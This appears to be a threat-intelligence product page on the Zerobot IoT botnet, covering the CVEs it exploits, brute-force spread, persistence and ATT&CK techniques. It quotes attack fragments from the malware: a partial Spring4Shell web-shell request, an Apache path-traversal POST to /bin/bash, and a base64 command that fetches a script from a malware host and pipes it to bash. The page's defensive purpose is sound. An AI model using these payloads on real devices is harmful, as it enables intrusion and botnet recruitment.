Zerobot is a botnet malware family associated with Mirai-style operations and earlier Go-based variants that target internet-exposed routers, cameras, firewalls, web servers, and other IoT or edge devices. It has been described as an evolving malware-as-a-service botnet and has been linked to activity tracked by Microsoft as Storm-1061. Zerobot is used to compromise vulnerable devices and enroll them into a distributed denial-of-service botnet.
The malware has propagated through exploitation of numerous known vulnerabilities in embedded devices and web-facing software, including flaws affecting Apache HTTP Server, Apache Spark, Spring, F5 BIG-IP, Hikvision devices, Tenda routers, Zyxel firewalls, Totolink routers, Realtek-based devices, D-Link devices, Huawei routers, and other network-connected products. Reporting also attributes spread to brute-force attempts against weak or default SSH and Telnet credentials. More recent Mirai-based Zerobot activity has exploited newly disclosed command-injection and remote-code-execution vulnerabilities in products such as n8n and Tenda routers, showing continued operator maintenance and rapid incorporation of fresh exploits.
Observed Zerobot payload chains commonly use shell scripts to retrieve architecture-specific binaries for a wide range of processor types. Linux-targeting variants establish persistence through service or desktop-entry mechanisms, while Windows-capable samples have also been observed using Startup-folder persistence. Zerobot has additionally been seen scanning for further exposed devices after compromise, attempting to remove competing malware, and clearing shell history or otherwise reducing forensic traces. Some variants include multiple DDoS attack methods and botnet-management functionality consistent with Mirai-derived malware. Later iterations have also used packing, encrypted strings, and browser-like user agents to complicate analysis and blend malicious traffic with legitimate activity.
Zerobot primarily targets Linux-based IoT and network-connected devices, but Windows-capable samples have been reported as well. The malware has been associated with exploitation of enterprise-facing applications in addition to traditional IoT targets, broadening its operational scope beyond consumer and embedded devices alone.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
30 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2017-17215 is included in Zerobot, but the article says the XML payload syntax is incorrect in two places, making it not functional. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
At the beginning, the article says Zerobot contained 21 exploits for various vulnerabilities, including Spring4Shell. Later it provides a two-request exploit chain for CVE-2022-22965. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2020-25506 is listed among the vulnerabilities exploited by Zerobot, with a POST /cgi-bin/system_mgr.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2016-20017 is listed among the vulnerabilities exploited by Zerobot, with a GET /login.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
Zerobot contained exploits for CVE-2014-8361. The article states the XML payload syntax is incorrect in two places and that this exploit is not functional. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-41773 and CVE-2021-42013 are both contained in the same Go method inside the malware binary, and separate POST paths are shown for each. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2020-10987 is listed among the vulnerabilities exploited by Zerobot, with a GET /goform/setUsbUnload/.js payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-1388 is listed among the vulnerabilities exploited by Zerobot, with a POST /mgmt/tm/util/bash request and JSON payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-36260 is listed among the vulnerabilities exploited by Zerobot, with a POST /SDK/webLanguage payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-34538 is listed among the vulnerabilities exploited by Zerobot, with a GET /cgi-bin/admin/vca/bia/addacph.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-30525 is listed among the vulnerabilities exploited by Zerobot, with a POST /ztp/cgi-bin/handler JSON payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-35395 is listed among the vulnerabilities exploited by Zerobot, with a POST /goform/formWsc payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-37061 is listed among the vulnerabilities exploited by Zerobot, with a POST /res.php payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2020-7209 is listed among the vulnerabilities exploited by Zerobot. The article notes the Go method is mislabeled as CVE-2017-17106 in the malware binary. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-26186 is listed among the vulnerabilities exploited by Zerobot, with a POST /cgi-bin/cstecgi.cgi?exportOvpn= payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-46422 is listed among the vulnerabilities exploited by Zerobot, with a GET /cgi-bin/admin.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-26210 is listed among the vulnerabilities exploited by Zerobot, with a POST /cgi-bin/cstecgi.cgi JSON payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-41773 and CVE-2021-42013 are both contained in the same Go method inside the malware binary, and separate POST paths are shown for each. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-25075 is listed among the vulnerabilities exploited by Zerobot, with a GET /cgi-bin/downloadFlile.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
Microsoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers. | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2019-10655 Grandstream | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2020-25223 WebAdmin of Sophos SG UTM | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Since the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2022-31137 Roxy-WI | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2017-17105 Zivif PR115-204-P-RS | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively). | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Microsoft researchers have also identified that previous reports have used the vulnerability ID “ZERO-32906” for CVE-2018-20057 | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot Exploits Flaws in n8n and Tenda Routers — ... exploiting vulnerabilities in the n8n AI automation platform (CVE-2025-68613) and Tenda routers (CVE-2025-7544) to expand its reach.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp ... first.prefix=tomcatwar ... Second request: GET /stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=
Daemon: Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
Daemon: Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
CVE-2021-41773 Apache webserver Path Traversal ... CVE-2021-42013 Apache webserver Path Traversal No.2 ... POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
The exploit code below is used with base64 encoding ... echo d2dldCBodHRwOi8vemVyby5zdWRvbGl0ZS5tbC96ZXJvLnNo ... | base64 -d | bash
This Go method is called CVE-2017-17106 in the malware binary, which is a completely different vulnerability ... These two exploits are contained in the same Go method inside the malware binary called CVE-2018-12613, which is a completely different vulnerability
Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices.
killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox || pkill -9 -f i .i mozi.m Mozi.m mozi.a Mozi.a sora phantom zero kaiten Nbrute minerd /bin/busybox
70 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a newer Mirai fork with added Windows infection capability.
Mirai-derived botnet malware targeting IoT devices and exposed services (notably Tenda AC1206 routers and n8n). It spreads via exploitation of RCE flaws, drops a shell script (tol.sh) to fetch and execute the main multi-architecture payload (zerobotv9), and provides DDoS-style attack capabilities (e.g., TCPXmas, Mixamp) plus additional methods (SSH, Discord).
Mirai-based botnet exploiting vulnerabilities in both traditional IoT (routers) and enterprise-adjacent automation platforms (n8n) to expand infections; may increase organizational risk by enabling compromise of more critical infrastructure.
Mirai-based IoT botnet that propagates by exploiting vulnerabilities (including in n8n and Tenda routers) to compromise devices and expand the botnet footprint.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.